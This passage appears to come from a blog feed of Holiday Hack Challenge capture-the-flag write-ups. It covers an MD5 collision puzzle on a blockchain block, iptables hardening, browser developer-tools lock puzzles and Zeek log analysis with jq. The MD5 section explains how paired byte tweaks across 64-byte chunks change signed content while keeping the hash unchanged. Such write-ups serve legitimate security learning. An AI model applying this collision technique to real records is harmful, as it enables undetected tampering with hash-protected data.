&lt;span class="ln">16&lt;/span> Data: b&lt;span class="s1">&amp;#39;255...019a43&amp;#39;&lt;/span>
&lt;span class="hl">&lt;span class="ln">17&lt;/span> Date: 03/24
&lt;/span>&lt;span class="ln">18&lt;/span> Time: 13:21:41
&lt;span class="ln">19&lt;/span> PreviousHash: 4a91947439046c2dbaa96db38e924665
&lt;span class="ln">20&lt;/span> Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
&lt;span class="ln">21&lt;/span> Signature: b&lt;span class="s1">&amp;#39;MJIx...MCtHfw==&amp;#39;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>There were several lines that stand at immediately as suspicious:&lt;/p>
&lt;ul>
&lt;li>&lt;strong>Line 7&lt;/strong> is suspicious because of the maxed-out integer value. In the hints a different value is mentioned by &lt;code>Tinsel&lt;/code>: &lt;strong>4,294,935,958&lt;/strong> which corresponds to &lt;code>FFFF8596&lt;/code> which has two bytes difference from &lt;code>FFFFFFFF&lt;/code>. However, this turns out to be a dead-end after realizing that this is not compatible with what I&amp;rsquo;ve learnt about the UNICOLL technique.&lt;/li>
&lt;li>&lt;strong>Line 8&lt;/strong> is suspicious because Jack does not seem to be a trustworthy character, so perhaps he may have flipped the Nice/Naughty switch in the block to cheat the system. This suspicion is confirmed later when I extract the PDF and unlock the hidden content originally written by Shinny as a report on Jack&amp;rsquo;s &lt;strong>Naughty&lt;/strong> behaviour!&lt;/li>
&lt;li>&lt;strong>Lines 10-11-12&lt;/strong> are suspicious just because no other block contained two files, but I cannot immediately explain why this is significant&lt;/li>
&lt;li>&lt;strong>Line 17&lt;/strong> is suspicious because I think that Jack might have tweaked the date to hide his activity and switched the month from December 24 to March 24. However, this seems to be a dead-end as well because it&amp;rsquo;s inconsistent with the &lt;strong>UNICOLLL&lt;/strong> technique.&lt;/li>
&lt;/ul>
&lt;p>Next I set out to inspect the PDF document closer, which I extract to filesystem using the provided python script. After opening it in &lt;code>HexFiend&lt;/code> I do not find anything suspicious at first, so I go back to the slide-deck from Ange to see if I can find some clues there, and I sure do:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/pdf-clue.png" alt="PDF Trickery">&lt;/p>
&lt;p>This slide shows a trick that can be used to tweak contents of the PDF by changing which object or page is referenced. I try the same on the extracted PDF, and it&amp;rsquo;s content changes dramatically. It goes from a glowing report on Jack to this:&lt;/p>
&lt;pre>&lt;code>Earlier today, I saw this bloke Jack Frost climb into one of our cages and repeatedly kick a wombat.
I don’t know what’s with him... it’s like he’s a few stubbies short of a six-pack or somethin’.
I don’t think the wombat was actually hurt... but I tell ya, it was more ‘n a bit shook up.
Then the bloke climbs outtathe cage all laughin’ and cacklin’ like it was some kind of bonza joke.
Never in my life have I seen someone who was that bloody evil...
- ”Quote from a Sidney (Australia) Zookeeper
I have reviewed a surveillance video tape showing the incident and found that it does, indeed, show that
Jack Frost deliberately traveled to Australia just to attack this cute, helpless animal. It was appalling.
I tracked Frost down and found him in Nepal. I confronted him with the evidence and, surprisingly, he seems
to actually be incredibly contrite. He even says that he’ll give me access to a digital photo that shows his
“utterly regrettable” actions. Even more remarkably, he’s allowing me to use his laptop to generate this
report – because for some reason, my laptop won’t connect to the WiFi here.
He says that he’s sorry and needs to be “held accountable for his actions.” He’s even said that I should
give him the biggest Naughty/Nice penalty possible. I suppose he believes that by cooperating with me,
that I’ll somehow feel obliged to go easier on him. That’s not going to happen... I’m WAAAAY smarter than old Jack.
Oh man... while I was writing this up, I received a call from my wife telling me that one of the pipes inour
house back in the North Pole has frozen and water is leaking everywhere. How could that have happened?
Jack is telling me that I should hurry back home. He says I should save this document and then he’ll go ahead and submit the full report for me.
I’m not completely sure I trust him, but I’ll make myself a note and go in and check to make absolutely sure he submits this properly.
Shinny Upatree3/24/2020
&lt;/code>&lt;/pre>&lt;p>&lt;strong>Note&lt;/strong>: on MacOS I have to open this PDF in either Firefox or Chrome, because the built-in reader detects some corruption that prevents it from opening properly.&lt;/p>
&lt;p>Once I have the hidden content I am sure that this is one of the 4 bytes that Jack has tweaked in the block.&lt;/p>
&lt;p>Next I open the whole block in &lt;code>HexFiend&lt;/code> to see it in its entirety. I spend many hours trying to find the two remaining bytes that Jack had tweaked. I am also in touch with some fellow HHC attendees who provide some great insight to help me avoid dead ends in my endeavors.&lt;/p>
&lt;p>Eventually what helps me tremendously is the slide-deck from Ange and a tip from &lt;code>joergen&lt;/code> to remember the 64 byte chunk sizes for MD5. This information combined with slide 113 eventually helps me find the remaining two bytes:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/slide-113.png" alt="Slide 113">&lt;/p>
&lt;p>Turns out, due to some cryptographic properties of MD5, if you change some byte in Chunk N to +1, then you need to change the byte on the same location in Chunk N+1 to keep the MD5 hash the same. Finally, it clicks why there is a random binary file attached to the block. It is the extra random garbage that helps with the flipping of the Sign from &lt;code>Naughty&lt;/code> to &lt;code>Nice&lt;/code> while keeping the hash of the whole block unchanged.&lt;/p>
&lt;p>Next I go back to &lt;code>HexFiend&lt;/code> with the whole block open and modify the 4 bytes using this rule:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/hex-fiend-solve.png" alt="Hex Fiend Solution">&lt;/p>
&lt;p>Tweaks explained:&lt;/p>
&lt;ol>
&lt;li>byte 73 was &lt;code>0x31&lt;/code> and I set it to &lt;code>0x30&lt;/code> so that it becomes &lt;code>Naughty&lt;/code> again&lt;/li>
&lt;li>to keep the MD5 from changing, I then had to increase byte 137 by 1 from &lt;code>0xD6&lt;/code> to &lt;code>0xD7&lt;/code>&lt;/li>
&lt;li>byte 265 was &lt;code>0x32&lt;/code> and I changed it to &lt;code>0x33&lt;/code> to fix the PDF document&lt;/li>
&lt;li>to keep the MD5 from changing, I then had to decrease byte 329 from &lt;code>0x1C&lt;/code> to &lt;code>0x1B&lt;/code>&lt;/li>
&lt;/ol>
&lt;p>Next, I use the docker image to get the MD5 and SHA256 values of the fixed block, and to my big surprise the MD5 remains unchanged:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="ln">1&lt;/span>root@c288761e5038:/usr/src/app# md5sum block129459.dat
&lt;span class="hl">&lt;span class="ln">2&lt;/span>b10b4a6bd373b61f32f4fd3a0cdfbf84
&lt;/span>&lt;span class="ln">3&lt;/span>root@c288761e5038:/usr/src/app# sha256sum block129459.dat
&lt;span class="hl">&lt;span class="ln">4&lt;/span>fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>I then submit the SHA256 hash of the fixed block &lt;code>fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb&lt;/code> and it is accepted as correct! 😎 🎉&lt;/p>
&lt;p>Finally, I go up to the balcony in Santa&amp;rsquo;s Office to complete the narrative and join the party:&lt;/p>
&lt;p>&lt;img src="../images/obj11b/victory.png" alt="Victory">&lt;/p></description></item><item><title>Open the Sleigh Shop Door</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective11/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective11/</guid><description>&lt;h2 id="ips-or-tables-what">IPs or Tables? What?!&lt;/h2>
&lt;p>Instructions in your personal badge:&lt;/p>
&lt;blockquote>
&lt;p>Visit Shinny Upatree in the Student Union and help solve their problem.
What is written on the paper you retrieve for Shinny?
For hints on achieving this objective, please visit the Student Union and talk with Kent Tinseltooth.&lt;/p>
&lt;/blockquote>
&lt;p>Once you teleport to the Student Union building through the air-vents system, you can get further hints from Kent, but first he needs your help with something quite urgent!&lt;/p>
&lt;p>&lt;img src="../images/obj11-kent.png" alt="Kent and his braces">&lt;/p>
&lt;blockquote>
&lt;p>OK, this is starting to freak me out!
Oh sorry, I&amp;rsquo;m Kent Tinseltooth. My Smart Braces are acting up.
Do&amp;hellip; Do you ever get the feeling you can hear things? Like, voices?
I know, I sound crazy, but ever since I got these&amp;hellip; Oh!
Do you think you could take a look at my Smart Braces terminal?
I&amp;rsquo;ll bet you can keep other students out of my head, so to speak.
It might just take a bit of Iptables work.&lt;/p>
&lt;/blockquote>
&lt;p>So after you get the hints from Kent about his problem, you can investigate further in the terminal device next to him:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Inner Voice: Kent. Kent. Wake up, Kent.
Inner Voice: I&lt;span class="s1">&amp;#39;m talking to you, Kent.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Who said that? I must be going insane.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Am I?
&lt;/span>&lt;span class="s1">Inner Voice: That remains to be seen, Kent. But we are having a conversation.
&lt;/span>&lt;span class="s1">Inner Voice: This is Santa, Kent, and you&amp;#39;&lt;/span>ve been a very naughty boy.
Kent TinselTooth: Alright! Who is this?! Holly? Minty? Alabaster?
Inner Voice: I am known by many names. I am the boss of the North Pole. Turn to me and be hired after graduation.
Kent TinselTooth: Oh, sure.
Inner Voice: Cut the candy, Kent, you&lt;span class="s1">&amp;#39;ve built an automated, machine-learning, sleigh device.
&lt;/span>&lt;span class="s1">Kent TinselTooth: How did you know that?
&lt;/span>&lt;span class="s1">Inner Voice: I&amp;#39;&lt;/span>m Santa - I know everything.
Kent TinselTooth: Oh. Kringle. *sigh*
Inner Voice: That&lt;span class="s1">&amp;#39;s right, Kent. Where is the sleigh device now?
&lt;/span>&lt;span class="s1">Kent TinselTooth: I can&amp;#39;&lt;/span>t tell you.
Inner Voice: How would you like to intern &lt;span class="k">for&lt;/span> the rest of time?
Kent TinselTooth: Please no, they&lt;span class="s1">&amp;#39;re testing it at srf.elfu.org using default creds, but I don&amp;#39;&lt;/span>t know more. It&lt;span class="s1">&amp;#39;s classified.
&lt;/span>&lt;span class="s1">Inner Voice: Very good Kent, that&amp;#39;&lt;/span>s all I needed to know.
Kent TinselTooth: I thought you knew everything?
Inner Voice: Nevermind that. I want you to think about what you&lt;span class="s1">&amp;#39;ve researched and studied. From now on, stop playing with your teeth, and floss more.
&lt;/span>&lt;span class="s1">Kent TinselTooth: Oh no, I sure hope that voice was Santa&amp;#39;&lt;/span>s.
Kent TinselTooth: I suspect someone may have hacked into my IOT teeth braces.
Kent TinselTooth: I must have forgotten to configure the firewall...
Kent TinselTooth: Please review /home/elfuuser/IOTteethBraces.md and &lt;span class="nb">help&lt;/span> me configure the firewall.
Kent TinselTooth: Please hurry&lt;span class="p">;&lt;/span> having this ribbon cable on my teeth is uncomfortable.
elfuuser@b17a1f97bf17:~$ cat /home/elfuuser/IOTteethBraces.md
&lt;span class="c1"># ElfU Research Labs - Smart Braces&lt;/span>
&lt;span class="c1">### A Lightweight Linux Device for Teeth Braces&lt;/span>
&lt;span class="c1">### Imagined and Created by ElfU Student Kent TinselTooth&lt;/span>
This device is embedded into one&lt;span class="err">&amp;#39;&lt;/span>s teeth braces &lt;span class="k">for&lt;/span> easy management and monitoring of dental status. It uses FTP and HTTP &lt;span class="k">for&lt;/span> management and monitoring purposes but also has SSH &lt;span class="k">for&lt;/span> remote access. Please refer to the management documentation &lt;span class="k">for&lt;/span> this purpose.
&lt;span class="c1">## Proper Firewall configuration:&lt;/span>
The firewall used &lt;span class="k">for&lt;/span> this system is &lt;span class="sb">`&lt;/span>iptables&lt;span class="sb">`&lt;/span>. The following is an example of how to &lt;span class="nb">set&lt;/span> a default policy with using &lt;span class="sb">`&lt;/span>iptables&lt;span class="sb">`&lt;/span>:
sudo iptables -P FORWARD DROP
The following is an example of allowing traffic from a specific IP and to a specific port:
sudo iptables -A INPUT -p tcp --dport &lt;span class="m">25&lt;/span> -s 172.18.5.4 -j ACCEPT
A proper configuration &lt;span class="k">for&lt;/span> the Smart Braces should be exactly:
1. Set the default policies to DROP &lt;span class="k">for&lt;/span> the INPUT, FORWARD, and OUTPUT chains.
2. Create a rule to ACCEPT all connections that are ESTABLISHED,RELATED on the INPUT and the OUTPUT chains.
3. Create a rule to ACCEPT only remote &lt;span class="nb">source&lt;/span> IP address 172.19.0.225 to access the &lt;span class="nb">local&lt;/span> SSH server &lt;span class="o">(&lt;/span>on port 22&lt;span class="o">)&lt;/span>.
4. Create a rule to ACCEPT any &lt;span class="nb">source&lt;/span> IP to the &lt;span class="nb">local&lt;/span> TCP services on ports &lt;span class="m">21&lt;/span> and 80.
5. Create a rule to ACCEPT all OUTPUT traffic with a destination TCP port of 80.
6. Create a rule applied to the INPUT chain to ACCEPT all traffic from the lo interface.
elfuuser@b17a1f97bf17:~$
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to solve this technical challenge, you need to follow the instructions at the end of the &lt;strong>IOTteethBraces.md&lt;/strong> file and implement the necessary IPTables rules to stop whoever is messing with Kent&amp;rsquo;s smart braces. I found this task to be quite straightforward, so I will just list the necessary commands below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elfuuser@4f938dab4458:~$ sudo iptables -P INPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P OUTPUT DROP
elfuuser@4f938dab4458:~$ sudo iptables -P FORWARD DROP
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -s 172.19.0.225 -p tcp --dport &lt;span class="m">22&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport &lt;span class="m">21&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -p tcp --dport &lt;span class="m">80&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A OUTPUT -p tcp --dport &lt;span class="m">80&lt;/span> -j ACCEPT
elfuuser@4f938dab4458:~$ sudo iptables -A INPUT -i lo -j ACCEPT
elfuuser@4f938dab4458:~$ Kent TinselTooth: Great, you hardened my IOT Smart Braces firewall!
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Finally, the additional hints from Kent are revealed:&lt;/p>
&lt;blockquote>
&lt;p>Oh thank you! It&amp;rsquo;s so nice to be back in my own head again. Er, alone.
By the way, have you tried to get into the crate in the Student Union? It has an interesting set of locks.
There are funny rhymes, references to perspective, and odd mentions of eggs!
And if you think the stuff in your browser looks strange, you should see the page source&amp;hellip;
Special tools? No, I don&amp;rsquo;t think you&amp;rsquo;ll need any extra tooling for those locks.
BUT - I&amp;rsquo;m pretty sure you&amp;rsquo;ll need to use Chrome&amp;rsquo;s developer tools for that one.
Or sorry, you&amp;rsquo;re a Firefox fan?
Yeah, Safari&amp;rsquo;s fine too - I just have an ineffible hunger for a physical Esc key.
Edge? That&amp;rsquo;s cool. Hm? No no, I was thinking of an unrelated thing.
Curl fan? Right on! Just remember: the Windows one doesn&amp;rsquo;t like double quotes.
Old school, huh? Oh sure - I&amp;rsquo;ve got what you need right here..&lt;/p>
&lt;/blockquote>
&lt;h2 id="hodor---main-objective">HODOR!?! - Main Objective&lt;/h2>
&lt;p>To kick off solving of this main objective, let&amp;rsquo;s go over to Shinny by the door to the right and talk with him:&lt;/p>
&lt;blockquote>
&lt;p>Psst - hey!
I&amp;rsquo;m Shinny Upatree, and I know what&amp;rsquo;s going on!
Yeah, that&amp;rsquo;s right - guarding the sleigh shop has made me privvy to some serious, high-level intel.
In fact, I know WHO is causing all the trouble.
Cindy? Oh no no, not that who. And stop guessing - you&amp;rsquo;ll never figure it out.
The only way you could would be if you could break into my crate, here.
You see, I&amp;rsquo;ve written the villain&amp;rsquo;s name down on a piece of paper and hidden it away securely!&lt;/p>
&lt;/blockquote>
&lt;p>Next you should click on the crate next to the door, in the corner, and open it in a new tab: &lt;strong>&lt;a href="https://sleighworkshopdoor.elfu.org/">https://sleighworkshopdoor.elfu.org/&lt;/a>&lt;/strong>. This will open web interface with 10 locks you need to open for the door to open up.&lt;/p>
&lt;p>&lt;img src="../images/obj11-locks.png" alt="Crate locks">&lt;/p>
&lt;p>They all look like the one above. Each lock also contains some short hint for solving it. As Kent noted, you need to get comfortable with the Developer tools of your chosen browser client. I use Google Chrome now, so this solution will include instruction for that environment.&lt;/p>
&lt;h3 id="lock-1">Lock 1&lt;/h3>
&lt;blockquote>
&lt;p>I locked the crate with the villain&amp;rsquo;s name inside. Can you get it out?&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Look into the console of your browser and see the code appear there:&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock1.png" alt="Lock1">&lt;/p>
&lt;h3 id="lock-2">Lock 2&lt;/h3>
&lt;blockquote>
&lt;p>Some codes are hard to spy, perhaps they&amp;rsquo;ll show up on pulp with dye?&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Open print preview, and see the code appear on the page next to the 2nd lock:&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock2.png" alt="Lock2">&lt;/p>
&lt;h3 id="lock-3">Lock 3&lt;/h3>
&lt;blockquote>
&lt;p>This code is still unknown; it was fetched but never shown.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Open the Developer tools and check the Network tab for any resources fetched, you will see a png file that holds the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock3.png" alt="Lock3">&lt;/p>
&lt;h3 id="lock-4">Lock 4&lt;/h3>
&lt;blockquote>
&lt;p>Where might we keep the things we forage? Yes, of course: Local barrels!&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Pretty straightforward hint, go to Developer tools, Local storage and look for the code there.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock4.png" alt="Lock4">&lt;/p>
&lt;h3 id="lock-5">Lock 5&lt;/h3>
&lt;blockquote>
&lt;p>Did you notice the code in the title? It may very well prove vital.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: Hover over the browser tab, to reveal its title and the code hiding in the 2nd line. Alternatively, you can check the HTML source and browse to the &lt;code>&amp;lt;title&amp;gt;&lt;/code> attribute to see the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock5.png" alt="Lock5">&lt;/p>
&lt;h3 id="lock-6">Lock 6&lt;/h3>
&lt;blockquote>
&lt;p>In order for this hologram to be effective, it may be necessary to increase your perspective.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: This was the first lock that was not so straightforward. There is some help in the hint that can be clicked under the text instruction. Also note the colourful card next to the lock with some characters on it already. It is likely that you need to increase the perspective property of that element in CSS editor, as pointed out in the hint. Some value in the thousands should be high enough to be able to read the code on the hologram card.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock6.png" alt="Lock6">&lt;/p>
&lt;h3 id="lock-7">Lock 7&lt;/h3>
&lt;blockquote>
&lt;p>The font you&amp;rsquo;re seeing is pretty slick, but this lock&amp;rsquo;s code was my first pick.
In the &lt;code>font-family&lt;/code> css property, you can list multiple fonts, and the first available font on the system will be used.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: You should check the font-family property of the text which conveys the hint, and see the code hidden there&amp;hellip;&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock7.png" alt="Lock7">&lt;/p>
&lt;h3 id="lock-8">Lock 8&lt;/h3>
&lt;blockquote>
&lt;p>In the event that the .eggs go bad, you must figure out who will be sad.
Google: &amp;ldquo;[your browser name] view event handlers&amp;rdquo;&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: You need to check the events related to the .eggs span in the hint paragraph. It hides the code you need.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock8.png" alt="Lock8">&lt;/p>
&lt;h3 id="lock-9">Lock 9&lt;/h3>
&lt;blockquote>
&lt;p>This next code will be unredacted, but only when all the chakras are :active.
It is a css pseudo class that is applied on elements in an active state.
Google: &amp;ldquo;[your browser name] force psudo classes&amp;rdquo;&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: For this lock, you need to add the &lt;strong>:active:&lt;/strong> property to all chakra spans, so they each reveal some fragment of the code.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock9.png" alt="Lock9">&lt;/p>
&lt;h3 id="lock-10">Lock 10&lt;/h3>
&lt;blockquote>
&lt;p>Oh, no! This lock&amp;rsquo;s out of commission! Pop off the cover and locate what&amp;rsquo;s missing.&lt;/p>
&lt;/blockquote>
&lt;p>&lt;strong>Hint&lt;/strong>: For this lock, you need to learn how to drag and drop HTML elements in the DOM tree explorer. Once you locate the &lt;code>&amp;lt;div&amp;gt;&lt;/code> for the lock&amp;rsquo;s cover, move it somewhere else to peek under it, and notice on the PCB board&amp;rsquo;s right edge the code. Write it down, them put the cover back and type it in to solve this lock.&lt;/p>
&lt;p>&lt;img src="../images/obj11-lock10.png" alt="Lock10">&lt;/p>
&lt;p>However, when you type in the code and double-checked it twice to make sure there are no typos, you will notice that it wouldn&amp;rsquo;t unlock. Upon further investigation you can see an error message in the console output:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">899c65f3-6ffa-4b5b-8214-73e08788bc80:1 Error: Missing macaroni!
at HTMLButtonElement.&amp;lt;anonymous&amp;gt; &lt;span class="o">(&lt;/span>899c65f3-6ffa-4b5b-8214-73e08788bc80:1&lt;span class="o">)&lt;/span>
&lt;span class="o">(&lt;/span>anonymous&lt;span class="o">)&lt;/span> @ 899c65f3-6ffa-4b5b-8214-73e08788bc80:1
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So the lock seems to want some &lt;strong>macaroni&lt;/strong>. If you search for it in the HTML page source you will find a div:&lt;/p>
&lt;p>&lt;img src="../images/obj11-macaroni.png" alt="Lock10">&lt;/p>
&lt;p>Drag and drop this into the last lock&amp;rsquo;s div to fix the error. Tip: you will need to this this twice more to fix two errors of the same kind: &lt;code>missing swab&lt;/code> and &lt;code>missing gnome&lt;/code>. Once these errors are fixed you can click UNLOCK and solve the challenge. The answer:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">The Tooth Fairy
&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="../images/obj11-solved.png" alt="Lock10">&lt;/p></description></item><item><title>Acknowledgements</title><link>https://flrnks.netlify.app/tutorials/kringlecon2020/conclusion/</link><pubDate>Sun, 10 Jan 2021 20:20:20 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2020/conclusion/</guid><description>&lt;p>So that&amp;rsquo;s it! I just finished the Holiday Hack Challenge 2020 completely!&lt;/p>
&lt;p>This is an especially rewarding feeling to have pulled this off for the 2nd year in a row. 2020 has been quite an unusual year, to say the least, for various reasons, good or bad. But this CTF at the very end of it is probably one of the most amazing ways to close it off on such a positive note.&lt;/p>
&lt;p>Firstly, I would like to thank the folks at CounterHack and the SANS Institute for putting it together. Itás been such a tumultuous year, yet thez delivered such a high quality product for us. I am especially impressed by the smooth progression in the difficulty of the objectives, and of course all the creativity that went into creating them. Just simply amazing!&lt;/p>
&lt;p>Secondly, I want to say thanks to all the peoople on Discord who helped me with gentle nudges in desperate times. I probably would have lost much more hair and finished it much later, if it weren&amp;rsquo;t for you gals:&lt;/p>
&lt;ul>
&lt;li>&lt;code>joergen&lt;/code>&lt;/li>
&lt;li>&lt;code>shahla&lt;/code>&lt;/li>
&lt;li>&lt;code>john_r2&lt;/code>&lt;/li>
&lt;li>&lt;code>legacyboy&lt;/code>&lt;/li>
&lt;li>&lt;code>tw2k&lt;/code>&lt;/li>
&lt;/ul>
&lt;p>Last but not least, I want to thank my family who allowed me to work on these objectives throughout most of the holiday season&amp;hellip; 😇&lt;/p>
&lt;p>&lt;img src="../images/conclusion/narrative.png" alt="Narrative">&lt;/p>
&lt;p>Already looking forward to what HHC 2021 will have in store!&lt;/p></description></item><item><title>Poisoned Weather Data</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective12/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective12/</guid><description>&lt;h2 id="zeek-no-more">Zeek no more!&lt;/h2>
&lt;p>Instructions in your badge:&lt;/p>
&lt;blockquote>
&lt;p>Use the data supplied in the Zeek JSON logs to identify the IP addresses of attackers poisoning Santa&amp;rsquo;s flight mapping software.
Block the 100 offending sources of information to guide Santa&amp;rsquo;s sleigh through the attack. Submit the Route ID (&amp;ldquo;RID&amp;rdquo;) success value that you&amp;rsquo;re given.
For hints on achieving this objective, please visit the Sleigh Shop and talk with Wunorse Openslae.&lt;/p>
&lt;/blockquote>
&lt;p>Links from hint:&lt;/p>
&lt;ul>
&lt;li>
&lt;a href="https://downloads.elfu.org/http.log.gz" target="_blank" rel="noopener">Zeek logs&lt;/a>&lt;/li>
&lt;li>
&lt;a href="https://srf.elfu.org/" target="_blank" rel="noopener">SRF website&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>Once you enter the Sleigh Shop Door, you will be greeted with these bunch:&lt;/p>
&lt;p>&lt;img src="../images/obj12-room.png" alt="Sleigh Shop">&lt;/p>
&lt;p>The Tooth Fairy greets you with the following:&lt;/p>
&lt;blockquote>
&lt;p>I’m the Tooth Fairy, the mastermind behind the plot to destroy the holiday season.
I hate how Santa is so beloved, but only works one day per year!
He has all of the resources of the North Pole and the elves to help him too.
I run a solo operation, toiling year-round collecting deciduous bicuspids and more from children.
But I get nowhere near the gratitude that Santa gets. He needs to share his holiday resources with the rest of us!
But, although you found me, you haven’t foiled my plot!
Santa’s sleigh will NOT be able to find its way.
I will get my revenge and respect!
I want my own holiday, National Tooth Fairy Day, to be the most popular holiday on the calendar!!!&lt;/p>
&lt;/blockquote>
&lt;p>Not a very good sign, but all is not lost yet. You should turn to Wunorse Openslae for some hints on defeating the Tooth Fairy, however he has a technical task for you before that:&lt;/p>
&lt;blockquote>
&lt;p>Wunorse Openslae here, just looking at some Zeek logs.
I&amp;rsquo;m pretty sure one of these connections is a malicious C2 channel&amp;hellip;
Do you think you could take a look?
I hear a lot of C2 channels have very long connection times.
Please use jq to find the longest connection in this data set.
We have to kick out any and all grinchy activity!&lt;/p>
&lt;/blockquote>
&lt;p>Next, you open the terminal and get to work:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">Some JSON files can get quite busy.
There&lt;span class="s1">&amp;#39;s lots to see and do.
&lt;/span>&lt;span class="s1">Does C&amp;amp;C lurk in our data?
&lt;/span>&lt;span class="s1">JQ&amp;#39;&lt;/span>s the tool &lt;span class="k">for&lt;/span> you!
-Wunorse Openslae
Identify the destination IP address with the longest connection duration
using the supplied Zeek logfile. Run runtoanswer to submit your answer.
elf@3222ffd89de4:~$ ls
conn.log
elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> wc -l
&lt;span class="m">143679&lt;/span>
elf@3222ffd89de4:~$
&lt;/code>&lt;/pre>&lt;/div>&lt;p>As you can see, it is a rather large log file, so you should use JQ to parse it. Since you are interested in the IP that belongs to the connection with longest duration, you should extract that field, then pipe the output through some unix tools that can help you find the highest value. Next you should run JQ once more to find the IP that belongs to this highest duration:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> jq &lt;span class="s2">&amp;#34;.duration&amp;#34;&lt;/span> &lt;span class="p">|&lt;/span> uniq &lt;span class="p">|&lt;/span> sort -g &lt;span class="p">|&lt;/span> tail -n &lt;span class="m">1&lt;/span>
1019365.337758
elf@3222ffd89de4:~$ cat conn.log &lt;span class="p">|&lt;/span> jq &lt;span class="s2">&amp;#34;. | select (.duration == 1019365.337758)&amp;#34;&lt;/span>
&lt;span class="o">{&lt;/span>
&lt;span class="s2">&amp;#34;ts&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;2019-04-18T21:27:45.402479Z&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;uid&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;CmYAZn10sInxVD5WWd&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.orig_h&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;192.168.52.132&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.orig_p&amp;#34;&lt;/span>: 8,
&lt;span class="s2">&amp;#34;id.resp_h&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;13.107.21.200&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;id.resp_p&amp;#34;&lt;/span>: 0,
&lt;span class="s2">&amp;#34;proto&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;icmp&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;duration&amp;#34;&lt;/span>: 1019365.337758,
&lt;span class="s2">&amp;#34;orig_bytes&amp;#34;&lt;/span>: 30781920,
&lt;span class="s2">&amp;#34;resp_bytes&amp;#34;&lt;/span>: 30382240,
&lt;span class="s2">&amp;#34;conn_state&amp;#34;&lt;/span>: &lt;span class="s2">&amp;#34;OTH&amp;#34;&lt;/span>,
&lt;span class="s2">&amp;#34;missed_bytes&amp;#34;&lt;/span>: 0,
&lt;span class="s2">&amp;#34;orig_pkts&amp;#34;&lt;/span>: 961935,
&lt;span class="s2">&amp;#34;orig_ip_bytes&amp;#34;&lt;/span>: 57716100,
